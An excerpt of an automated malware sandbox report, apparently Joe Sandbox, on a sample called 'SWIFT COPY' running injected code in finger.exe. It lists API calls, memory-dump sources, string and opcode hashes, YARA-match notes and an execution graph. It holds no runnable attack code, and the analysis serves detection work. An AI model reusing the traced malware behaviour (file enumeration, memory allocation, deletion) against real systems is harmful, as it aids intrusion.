                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: %%%u$]:%u
                                                                                              • API String ID: 48624451-3050659472
                                                                                              • Opcode ID: 59beedefae265c8de5dc244c4c47e5ea9fb3607fcee2552de405361c8b30dab8
                                                                                              • Instruction ID: bdf775bbe99453ee4a424fc81bc0a2472e20f974814c3299363d64a345543b75
                                                                                              • Opcode Fuzzy Hash: 59beedefae265c8de5dc244c4c47e5ea9fb3607fcee2552de405361c8b30dab8
                                                                                              • Instruction Fuzzy Hash: 89314172A003299EDB20DF2DCC44BEFB7FCEB54614F44455AE949E3240EB30AA448FA0
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __aulldvrm
                                                                                              • String ID: +$-
                                                                                              • API String ID: 1302938615-2137968064
                                                                                              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                              • Instruction ID: 1d2a52cd8d48fef0b9e6ffbbb2675245c71a229e305741b9cb1af660965615c2
                                                                                              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                              • Instruction Fuzzy Hash: 9B91C271E0020A9BEF34DF6DC988ABEBBA5EF44328F14451AE955E76C0D7388941CB51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $$@
                                                                                              • API String ID: 0-1194432280
                                                                                              • Opcode ID: 5fb9d1e3cde89684f2b0ff4e2f967281e5b297e895065fcf7e08030375886aa0
                                                                                              • Instruction ID: 9f2e60689bb1b4be48d8826646e459a9a566ea70ef629ff417bf5432a5bbcd4a
                                                                                              • Opcode Fuzzy Hash: 5fb9d1e3cde89684f2b0ff4e2f967281e5b297e895065fcf7e08030375886aa0
                                                                                              • Instruction Fuzzy Hash: 42811B72D00669DBDB358F58CC44BEAB7B8AB48718F0041DAEA19B7680D7705E84CFA4

                                                                                              Execution Graph

                                                                                              Execution Coverage:2.5%
                                                                                              Dynamic/Decrypted Code Coverage:4.3%
                                                                                              Signature Coverage:1.6%
                                                                                              Total number of Nodes:444
                                                                                              Total number of Limit Nodes:74
100047->100048 100049 2898deb 100047->100049 100052 3092f30 LdrInitializeThunk 100048->100052 100049->100043 100050 2898e91 100050->100043 100052->100050 100127 288aef0 100132 288ac00 100127->100132 100129 288aefd 100146 288a870 100129->100146 100131 288af19 100133 288ac25 100132->100133 100157 2888510 100133->100157 100136 288ad70 100136->100129 100138 288ad87 100138->100129 100139 288ad7e 100139->100138 100141 288ae75 100139->100141 100176 288a2c0 100139->100176 100143 288aeda 100141->100143 100185 288a630 100141->100185 100144 289b6c0 RtlFreeHeap 100143->100144 100145 288aee1 100144->100145 100145->100129 100147 288a886 100146->100147 100154 288a891 100146->100154 100148 289b7a0 RtlAllocateHeap 100147->100148 100148->100154 100149 288a8b5 100149->100131 100150 2888510 GetFileAttributesW 100150->100154 100151 288abd2 100152 288abeb 100151->100152 100153 289b6c0 RtlFreeHeap 100151->100153 100152->100131 100153->100152 100154->100149 100154->100150 100154->100151 100155 288a2c0 RtlFreeHeap 100154->100155 100156 288a630 RtlFreeHeap 100154->100156 100155->100154 100156->100154 100158 2888531 100157->100158 100159 2888538 GetFileAttributesW 100158->100159 100160 2888543 100158->100160 100159->100160 100160->100136 100161 2893550 100160->100161 100162 289355e 100161->100162 100163 2893565 100161->100163 100162->100139 100164 2884700 LdrLoadDll 100163->100164 100165 289359a 100164->100165 100166 28935a9 100165->100166 100189 2893010 LdrLoadDll 100165->100189 100168 289b7a0 RtlAllocateHeap 100166->100168 100172 2893757 100166->100172 100169 28935c2 100168->100169 100170 289374d 100169->100170 100169->100172 100174 28935de 100169->100174 100171 289b6c0 RtlFreeHeap 100170->100171 100170->100172 100171->100172 100172->100139 100173 289b6c0 RtlFreeHeap 100175 2893741 100173->100175 100174->100172 100174->100173 100175->100139 100177 288a2e6 100176->100177 100190 288dd30 100177->100190 100179 288a358 100181 288a4e0 100179->100181 100182 288a376 100179->100182 100180 288a4c5 
100180->100139 100181->100180 100183 288a180 RtlFreeHeap 100181->100183 100182->100180 100195 288a180 100182->100195 100183->100181 100186 288a656 100185->100186 100187 288dd30 RtlFreeHeap 100186->100187 100188 288a6dd 100187->100188 100188->100141 100189->100166 100192 288dd54 100190->100192 100191 288dd61 100191->100179 100192->100191 100193 289b6c0 RtlFreeHeap 100192->100193 100194 288dda4 100193->100194 100194->100179 100196 288a19d 100195->100196 100199 288ddc0 100196->100199 100198 288a2a3 100198->100182 100200 288dde4 100199->100200 100201 288de8e 100200->100201 100202 289b6c0 RtlFreeHeap 100200->100202 100201->100198 100202->100201 100203 2880f70 100204 2880f89 100203->100204 100205 2884700 LdrLoadDll 100204->100205 100206 2880fa7 100205->100206 100207 2880ff3 100206->100207 100208 2880fe0 PostThreadMessageW 100206->100208 100208->100207 100053 2890330 100054 289034d 100053->100054 100055 2884700 LdrLoadDll 100054->100055 100056 289036b 100055->100056 100209 2896270 100210 28962ca 100209->100210 100212 28962d7 100210->100212 100213 2893c80 100210->100213 100214 289b630 NtAllocateVirtualMemory 100213->100214 100216 2893cc1 100214->100216 100215 2893dbd 100215->100212 100216->100215 100217 2884700 LdrLoadDll 100216->100217 100218 2893d07 100217->100218 100218->100215 100219 2893d45 Sleep 100218->100219 100219->100218

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 5Z$9$<$>$L$N$N$Pw$So$`$fN$j$m$n$X$s
                                                                                              • API String ID: 0-2357910541
                                                                                              • Opcode ID: 9582a658eb137406f3bf7cdfd2278e0763a54f8c99eff3a0a33e665a6ef9d154
                                                                                              • Instruction ID: 176fadd7b4c288ba2c4c130d5a8bfa74eb89cdb48b08a1a6fcb70dad1e856cac
                                                                                              • Opcode Fuzzy Hash: 9582a658eb137406f3bf7cdfd2278e0763a54f8c99eff3a0a33e665a6ef9d154
                                                                                              • Instruction Fuzzy Hash: 9902B2B8D05229CFEB28CF98C8947EDBBB2BB44308F1081D9D509BB281D7795A85CF55
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 0288C894
                                                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 0288C8CF
                                                                                              • FindClose.KERNELBASE(?), ref: 0288C8DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                              • String ID:
                                                                                              • API String ID: 3541575487-0
                                                                                              • Opcode ID: 74d106090a7080095cc7420a55ff87f1c068363cb79c4006443c16e485b3f75b
                                                                                              • Instruction ID: b2df5359fde612536febafc5ee7dd01ffc0b7e394937bbd9dfca82d89c28487b
                                                                                              • Opcode Fuzzy Hash: 74d106090a7080095cc7420a55ff87f1c068363cb79c4006443c16e485b3f75b
                                                                                              • Instruction Fuzzy Hash: 63316E79A40308BBDB24EBA4CC89FEF777DDB44744F144499B908E6180DA70AA848BA1
                                                                                              APIs
                                                                                              • NtCreateFile.NTDLL(161FBA40,?,?,?,?,?,?,?,?,?,?), ref: 02899438
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 913b0aa7505f0623b442c70bc7bed9716eb88d71eb565b98757f04a2e86dff34
                                                                                              • Instruction ID: 77468071aa12d8a41de21ba2659b834d47dc120dcb7e9d20439ecb3dee0f8cbc
                                                                                              • Opcode Fuzzy Hash: 913b0aa7505f0623b442c70bc7bed9716eb88d71eb565b98757f04a2e86dff34
                                                                                              • Instruction Fuzzy Hash: FA31D5B9A00648ABCB14DF99D880EDEB7F9EF8C700F148219F919A7340D730A951CFA5
                                                                                              APIs
                                                                                              • NtReadFile.NTDLL(161FBA40,?,?,?,?,?,?,?,?), ref: 02899580
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: e6f3ba0a2a121550311ff52ac0598f0ab7352921171cdb98717c8912cdbe003b
                                                                                              • Instruction ID: 54025025ce606f13948ebb68687e15b21ebfd96d8bd98181fbcd3a74a9c5e5ab
                                                                                              • Opcode Fuzzy Hash: e6f3ba0a2a121550311ff52ac0598f0ab7352921171cdb98717c8912cdbe003b
                                                                                              • Instruction Fuzzy Hash: 4531C7B9A00608ABCB14DF99D880EDFB7F9EF88714F148219FD19A7240D734A911CFA5
                                                                                              APIs
                                                                                              • NtAllocateVirtualMemory.NTDLL(161FBA40,?,028981AF,00000000,00000004,00003000,?,?,?,?,?,028981AF,02881F4E), ref: 02899855
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateMemoryVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 2167126740-0
                                                                                              • Opcode ID: a1c1bc1c7ed6e412f4197ea02707f05ce7fd928f0e11f28bcc27ba9ea0b3128d
                                                                                              • Instruction ID: 4808424dba997cfe3f77a98dd7196e49edb12c269b9339f3ad130cd1ef098e3f
                                                                                              • Opcode Fuzzy Hash: a1c1bc1c7ed6e412f4197ea02707f05ce7fd928f0e11f28bcc27ba9ea0b3128d
                                                                                              • Instruction Fuzzy Hash: 172126B9A00208ABDB14DF99CC41EAFB7B9EF88700F10821DFD18A7240D734A911CFA5
                                                                                              APIs
                                                                                              • NtDeleteFile.NTDLL(161FBA40), ref: 02899620
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DeleteFile
                                                                                              • String ID:
                                                                                              • API String ID: 4033686569-0
                                                                                              • Opcode ID: d7fd5be2052f01351cd39b10a120a2b64c712234ba1b204dfdc6d8a01e2bf1db
                                                                                              • Instruction ID: 0e0e1148cec6f95c81724970bd041dc38d446b9685e9de763e78ed24620adc2c
                                                                                              • Opcode Fuzzy Hash: d7fd5be2052f01351cd39b10a120a2b64c712234ba1b204dfdc6d8a01e2bf1db
                                                                                              • Instruction Fuzzy Hash: 4E11A079610608BBDB20EB69CC41FEB73ADDF89704F148159FA09A7241D771A9058FF2
                                                                                              APIs
                                                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02899661
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close
                                                                                              • String ID:
                                                                                              • API String ID: 3535843008-0
                                                                                              • Opcode ID: 085c86df9dafaac33c1aaa89ff5402a964957b63bb21a493f7364fc0a86431e4
                                                                                              • Instruction ID: 03c3f9810e7bcc5d448c5eeaafde87fd669ca12ba5871716a3cb5f0cc9553caf
                                                                                              • Opcode Fuzzy Hash: 085c86df9dafaac33c1aaa89ff5402a964957b63bb21a493f7364fc0a86431e4
                                                                                              • Instruction Fuzzy Hash: 46E0467A2002047BC620EA5ADC40F9BB7AEDFC6710F008015FA08A7240CA70BA12CAE5
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: e8aad0e38ee1d027ecc78bf005708dc1004c30bcaff68d78624033a1c9b2971b
                                                                                              • Instruction ID: 21ba881b6681b1b802150631fc2dc8d423a61d5f7286c789c3cf9f841ad1aeef
                                                                                              • Opcode Fuzzy Hash: e8aad0e38ee1d027ecc78bf005708dc1004c30bcaff68d78624033a1c9b2971b
                                                                                              • Instruction Fuzzy Hash: A7900271B06C0412A140B1DC9884546444597F0301B55C011E0424554C8B148A565361
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 1af985360e47595994e062da73b0b389449bb4869df57d3eccd403d1047b0f21
                                                                                              • Instruction ID: 0cd9704f9aff4e8afbc035e489f577d69f64ef24f0d723d0e60d4103a81158e9
                                                                                              • Opcode Fuzzy Hash: 1af985360e47595994e062da73b0b389449bb4869df57d3eccd403d1047b0f21
                                                                                              • Instruction Fuzzy Hash: 1D9002A1B02904425140B1DC9804406644597F1301395C115A0554560C871889559269
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 78c3b756e0cbef5bcd985e92b56d6d4a231b3893ff9d6ea9f2d9d6a1fac2cd39
                                                                                              • Instruction ID: f57441aa48abd3bcfdc278d24b964b751ec3e4a0672d7adbb248889a3ba76b9c
                                                                                              • Opcode Fuzzy Hash: 78c3b756e0cbef5bcd985e92b56d6d4a231b3893ff9d6ea9f2d9d6a1fac2cd39
                                                                                              • Instruction Fuzzy Hash: 929002A1703804035105B1DC9414616444A87F0201B55C021E1014590DC62589916125
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: e2172007bb43175ea353705dbb45286fb05c8a1f9a0bcc99ad8f02925314eef7
                                                                                              • Instruction ID: 0e2c121733997f965071a45692f108f47d98dd86e5c9e8d2bbd514bd150ab23e
                                                                                              • Opcode Fuzzy Hash: e2172007bb43175ea353705dbb45286fb05c8a1f9a0bcc99ad8f02925314eef7
                                                                                              • Instruction Fuzzy Hash: 9B900271B0680C02E150B1DC9414746044587E0301F55C011A0024654D87558B5576A1
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: dba7e18b01d0ccc20cbc086a30d25bc8756040ac8a8bacc1e278dd7bd939b8b8
                                                                                              • Instruction ID: ab03a3d5a1f824ff1639decfa7140a8ea5bee114c5addcb584a3f9150e619831
                                                                                              • Opcode Fuzzy Hash: dba7e18b01d0ccc20cbc086a30d25bc8756040ac8a8bacc1e278dd7bd939b8b8
                                                                                              • Instruction Fuzzy Hash: 1A90027170684C42E140B1DC9404A46045587E0305F55C011A0064694D97258E55B661
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 72946bad9fd3def89e2e82cedcb250b0bd0f25d67d271046f61405dceb5458ff
                                                                                              • Instruction ID: 3db3ef857e0cd491d8d4dc0c151d9b7d3a58bb7d594343858fe93705df94e34c
                                                                                              • Opcode Fuzzy Hash: 72946bad9fd3def89e2e82cedcb250b0bd0f25d67d271046f61405dceb5458ff
                                                                                              • Instruction Fuzzy Hash: 8D90027170280C02E180B1DC940464A044587E1301F95C015A0025654DCB158B5977A1
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 7a50d1bdd127c266be118998907985475c5596cf223ac3b42452aa5384a2800c
                                                                                              • Instruction ID: 7e10a87195fa1a5cbdec14d7285c3d171460eb692888b4fc1c8cb4127583a2ea
                                                                                              • Opcode Fuzzy Hash: 7a50d1bdd127c266be118998907985475c5596cf223ac3b42452aa5384a2800c
                                                                                              • Instruction Fuzzy Hash: 86900475713C04031105F5DC570450704C7C7F5351355C031F1015550CD731CD715131
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: aa87c209a4d4f433fd1540710d125e82c349201a48712adfc9171e9bbcd263e1
                                                                                              • Instruction ID: 08c42b6c5dff3bcc14d8db36dc3ef634afda4c323ad2abd2413d1fe325b55848
                                                                                              • Opcode Fuzzy Hash: aa87c209a4d4f433fd1540710d125e82c349201a48712adfc9171e9bbcd263e1
                                                                                              • Instruction Fuzzy Hash: 55900265722804021145F5DC560450B088597E6351395C015F1416590CC72189655321
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 208fed9fe70b537c976e4c65e2834b74603a43ee5205813a0a1d26a90d53e2b7
                                                                                              • Instruction ID: eabda0a3a17a4cc5e64c7874520055868a19f7565f6855576cf73e1922d8477a
                                                                                              • Opcode Fuzzy Hash: 208fed9fe70b537c976e4c65e2834b74603a43ee5205813a0a1d26a90d53e2b7
                                                                                              • Instruction Fuzzy Hash: 809002A174280842E100B1DC9414B060445C7F1301F55C015E1064554D8719CD526126
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: df20b500a9d0264a0694a18848c06c221b3ba25350d8b3634398d1f0baeb8ab2
                                                                                              • Instruction ID: 0030ac85f373a10f230c0abb551a785d2ad59c9fe69b7c7256ec21b088741b2f
                                                                                              • Opcode Fuzzy Hash: df20b500a9d0264a0694a18848c06c221b3ba25350d8b3634398d1f0baeb8ab2
                                                                                              • Instruction Fuzzy Hash: 7F900261B02804425140B1ECD8449064445ABF1211755C121A0998550D865989655665
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: ca2cbd94176a8985892efdfe57278fa4219a8274ca10e4800bb3471f94b391ac
                                                                                              • Instruction ID: ebad0d73a34809a8e53cdbb00ba94a4353df6577dc89e226785fdbef313c2a05
                                                                                              • Opcode Fuzzy Hash: ca2cbd94176a8985892efdfe57278fa4219a8274ca10e4800bb3471f94b391ac
                                                                                              • Instruction Fuzzy Hash: 5C900261712C0442E200B5EC9C14B07044587E0303F55C115A0154554CCA1589615521
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: f2013ff0630e7100ac6aec60bacbe6cbb877f58a6f1372033a7c32a424bdc4d1
                                                                                              • Instruction ID: 765a5f4abad16818fb27d4f375108811416d6dc36079a2a574d1f76b69f0c4ea
                                                                                              • Opcode Fuzzy Hash: f2013ff0630e7100ac6aec60bacbe6cbb877f58a6f1372033a7c32a424bdc4d1
                                                                                              • Instruction Fuzzy Hash: E8900261B0280902E101B1DC9404616044A87E0241F95C022A1024555ECB258A92A131
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: c9f2556801bfb37bbc79590a64d31f59fad71ede16c8665d498ab497bd0e22b4
                                                                                              • Instruction ID: 9e78f80f858fb3a748b40bc4721e098f2b1235491e5f39946faf0fafb022cfd2
                                                                                              • Opcode Fuzzy Hash: c9f2556801bfb37bbc79590a64d31f59fad71ede16c8665d498ab497bd0e22b4
